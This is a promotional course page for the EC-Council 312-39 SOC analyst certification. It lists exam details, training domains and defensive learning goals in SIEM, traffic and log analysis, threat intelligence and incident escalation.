🚀 Launch Special: $29/mo for life --d --h --m --s Claim Your Price →
312-39
Coming Soon
Expected availability announced soon

This course is in active development. Preview the scope below and create a free account to be notified the moment it goes live.

Notify me
312-39 EC-Council Coming Soon

ECCouncil CSA

The CSA certification trains SOC analysts to operate and manage security operations, deploy and tune SIEMs, analyze network traffic, monitor endpoints, and conduct threat intelligence, delivering rapid, accurate incident response.

180
Minutes
100
Questions
70/100
Passing Score
$999
Exam Cost

Who Should Take This

It targets security professionals working in enterprise SOCs who have at least two years of experience in monitoring or incident response and seek to deepen technical expertise in SIEM management, traffic analysis, and threat intel to advance their career and leadership opportunities.

What's Covered

1 SOC Operations and Management
2 SIEM Deployment and Management
3 Network Traffic Analysis
4 Endpoint Monitoring and Analysis
5 Threat Intelligence Operations
6 Incident Escalation and Response
7 Log Analysis and Forensics
8 Compliance and Reporting

What's Included in AccelaStudy® AI

Adaptive Knowledge Graph
Practice Questions
Lesson Modules
Console Simulator Labs
Exam Tips & Strategy
20 Activity Formats

Course Outline

60 learning goals
1 SOC Operations and Management
2 topics

SOC architecture and workflows

  • Apply SOC operational workflows including alert intake triage escalation procedures shift handover and ticket management using standardized processes.
  • Analyze SOC maturity levels to evaluate detection capabilities response times and operational efficiency against industry benchmarks.
  • Apply SOC technology stack deployment including SIEM SOAR EDR NDR and threat intelligence platforms for integrated security monitoring.
  • Design SOC operational procedures including standard operating procedures runbooks escalation matrices and communication protocols for consistent operations.

SOC roles and analyst tiers

  • Apply Tier I analyst procedures including alert monitoring initial triage false positive identification and escalation to Tier II for complex events.
  • Apply Tier II analyst procedures including deep-dive investigation correlation across data sources and incident confirmation with detailed documentation.
  • Analyze SOC performance metrics including MTTD MTTR false positive rates and analyst workload to identify operational improvement opportunities.
  • Apply SOC shift management including knowledge transfer documentation open case handover and cross-shift communication for continuous coverage.
2 SIEM Deployment and Management
2 topics

SIEM architecture and configuration

  • Apply SIEM deployment including Splunk QRadar Sentinel and ELK stack installation log source onboarding and initial configuration for enterprise environments.
  • Apply log source integration for Windows event logs Linux syslog firewall logs proxy logs cloud audit trails and application logs into SIEM platforms.
  • Apply SIEM normalization parsing and field extraction to standardize heterogeneous log formats for consistent correlation and search capabilities.
  • Analyze SIEM architecture scalability to evaluate storage requirements ingestion rates retention policies and query performance for enterprise growth.

Correlation rules and alerting

  • Apply SIEM correlation rule development including threshold-based behavioral and chain rules to detect multi-stage attack patterns across log sources.
  • Apply alert tuning to reduce false positives including whitelist management threshold adjustment and contextual enrichment for improved signal-to-noise ratios.
  • Analyze correlation rule effectiveness by evaluating detection coverage false positive rates and missed detections against MITRE ATT&CK technique mapping.
  • Design SIEM use case libraries mapping detection rules to specific threat scenarios attack techniques and compliance monitoring requirements.
3 Network Traffic Analysis
2 topics

Packet analysis and protocol inspection

  • Apply packet capture analysis using Wireshark tcpdump and network TAPs to inspect TCP IP UDP ICMP and application layer protocols for anomalous behavior.
  • Apply NetFlow sFlow and IPFIX analysis to identify unusual traffic volumes suspicious communication patterns and data exfiltration indicators.
  • Analyze DNS traffic to identify tunneling domain generation algorithms fast flux networks and command-and-control communication channels.
  • Analyze HTTP HTTPS traffic including TLS anomalies certificate validation failures and suspicious user-agent strings for web-based threat detection.
  • Apply SIEM use case development to create detection rules for brute-force attacks lateral movement data exfiltration and privilege escalation patterns.

Network behavior analysis

  • Apply network baseline establishment using traffic profiling port utilization and communication pattern mapping for deviation-based anomaly detection.
  • Analyze lateral movement indicators including port scanning credential reuse SMB enumeration and RDP brute force patterns across internal network segments.
  • Apply NDR tools to detect encrypted traffic anomalies beaconing behavior and covert channel communication without requiring payload decryption.
  • Apply deep packet inspection to identify protocol anomalies malformed headers and tunneled traffic used for data exfiltration and C2 communication.
4 Endpoint Monitoring and Analysis
2 topics

Endpoint detection and response

  • Apply EDR telemetry analysis including process trees file system events registry modifications and network connections to identify malicious endpoint activity.
  • Apply Windows event log analysis including security authentication Sysmon and PowerShell logs to detect credential attacks process injection and persistence.
  • Apply Linux audit log analysis including syslog auth.log and auditd to detect privilege escalation unauthorized access and suspicious process execution.
  • Analyze endpoint IOCs including suspicious process hierarchies unusual DLL loads scheduled task creation and service installations to confirm compromises.

Threat hunting on endpoints

  • Apply hypothesis-driven threat hunting using MITRE ATT&CK techniques to proactively search for undetected threats across endpoint telemetry.
  • Apply IOC-based hunting using file hashes IP addresses domain names and behavioral signatures to sweep enterprise endpoints for known threats.
  • Analyze threat hunting results to identify detection gaps update correlation rules and improve endpoint monitoring coverage for emerging threat techniques.
5 Threat Intelligence Operations
2 topics

Threat intelligence integration

  • Apply threat intelligence platform management including feed aggregation IOC deduplication confidence scoring and integration with SIEM and EDR for automated enrichment.
  • Apply STIX TAXII and OpenIOC standards to consume share and operationalize threat intelligence data across organizational and industry boundaries.
  • Analyze threat intelligence reports to extract relevant IOCs TTPs and actor profiles for detection rule development and proactive defense measures.
  • Design threat intelligence workflows incorporating collection processing analysis dissemination and feedback loops for continuous intelligence improvement.
  • Apply incident escalation procedures including severity classification stakeholder notification SLA management and cross-team coordination workflows.

Threat landscape analysis

  • Apply MITRE ATT&CK framework mapping to classify observed adversary behaviors and identify technique coverage gaps in SOC detection capabilities.
  • Analyze threat actor profiles including nation-state APTs cybercriminal groups and hacktivists to assess organizational risk exposure and targeting likelihood.
  • Apply threat modeling techniques including STRIDE and attack trees to identify potential attack paths against organizational critical assets and infrastructure.
6 Incident Escalation and Response
2 topics

Alert analysis and escalation

  • Apply multi-source alert correlation to validate security events by cross-referencing SIEM alerts EDR detections and network anomalies for incident confirmation.
  • Apply incident escalation procedures including severity classification evidence packaging and Tier III handoff documentation for confirmed security incidents.
  • Analyze complex multi-stage attacks by correlating events across kill chain phases to reconstruct attack timelines and identify all affected assets.
  • Apply initial containment recommendations including account suspension IP blocking and endpoint isolation to limit damage during incident escalation.

SOAR and automation

  • Apply SOAR platform playbooks to automate repetitive SOC tasks including IOC enrichment ticket creation containment actions and notification workflows.
  • Apply automated incident response workflows including phishing analysis endpoint isolation threat intelligence lookups and evidence collection for reduced response times.
  • Design SOAR automation strategies identifying high-volume repetitive tasks for automation while maintaining analyst oversight for complex decision points.
7 Log Analysis and Forensics
2 topics

Log analysis techniques

  • Apply Windows security log analysis to detect authentication failures privilege escalation group policy changes and suspicious service installations.
  • Apply web server log analysis including Apache IIS and Nginx access and error logs to identify injection attacks directory traversal and brute force attempts.
  • Apply email gateway log analysis to identify phishing campaigns spam waves and malicious attachment delivery patterns across the enterprise.
  • Analyze correlated log data across multiple sources to reconstruct security incidents determine root cause and identify all compromised systems and data.
  • Apply threat intelligence feeds including STIX/TAXII MISP and commercial platforms to enrich SIEM alerts with contextual threat data.

Cloud and application log analysis

  • Apply cloud audit log analysis including AWS CloudTrail Azure Activity Log and GCP Audit Logs to detect unauthorized API calls and configuration changes.
  • Apply database activity monitoring log analysis to detect SQL injection unauthorized data access and privilege abuse across enterprise database platforms.
  • Analyze application log anomalies including authentication failures error rate spikes and API abuse patterns to identify application-layer attack campaigns.
8 Compliance and Reporting
1 topic

SOC reporting and compliance monitoring

  • Apply compliance monitoring using SIEM rules to detect PCI-DSS HIPAA SOX and GDPR control violations and generate audit-ready compliance evidence.
  • Apply SOC reporting including daily operational summaries weekly trend analysis monthly executive reports and quarterly security posture assessments.
  • Analyze security event trends to identify recurring attack patterns emerging threat vectors and detection coverage gaps requiring operational adjustments.
  • Design SOC dashboard frameworks presenting real-time threat landscape operational metrics and compliance status for multiple stakeholder audiences.
  • Design SOC metrics and KPI dashboards tracking MTTD MTTR alert volume false positive rates and analyst workload for operational improvement.

Scope

Included Topics

  • All domains in EC-Council CSA covering SOC operations monitoring analysis and incident escalation for Tier I and Tier II SOC analysts.
  • SOC fundamentals including architecture team roles workflows technology stack and operational procedures for 24/7 security monitoring.
  • SIEM deployment and management including log source integration correlation rule development alert tuning dashboards and compliance reporting.
  • Threat intelligence integration including IOC management threat feeds STIX/TAXII and intelligence-driven detection for proactive monitoring.
  • Incident detection and analysis including network packet analysis endpoint telemetry review log correlation and alert triage.
  • Log analysis techniques for Windows Linux web servers email gateways cloud platforms and database activity monitoring.

Not Covered

  • Offensive penetration testing and exploit development covered by CEH and CPENT.
  • Full incident response lifecycle including containment eradication and recovery covered by ECIH.
  • Network defense architecture design and perimeter security engineering covered by CND.
  • Digital forensics evidence collection and malware reverse engineering covered by CHFI.
  • Executive security governance and CISO-level program management covered by CCISO.

Official Exam Page

Learn more at EC-Council

Visit

312-39 is coming soon

Adaptive learning that maps your knowledge and closes your gaps.

Create Free Account to Be Notified

Trademark Notice

EC-Council®, CEH®, and all EC-Council certification marks are registered trademarks of the International Council of Electronic Commerce Consultants. EC-Council does not endorse this product.

AccelaStudy® and Renkara® are registered trademarks of Renkara Media Group, Inc. All third-party marks are the property of their respective owners and are used for nominative identification only.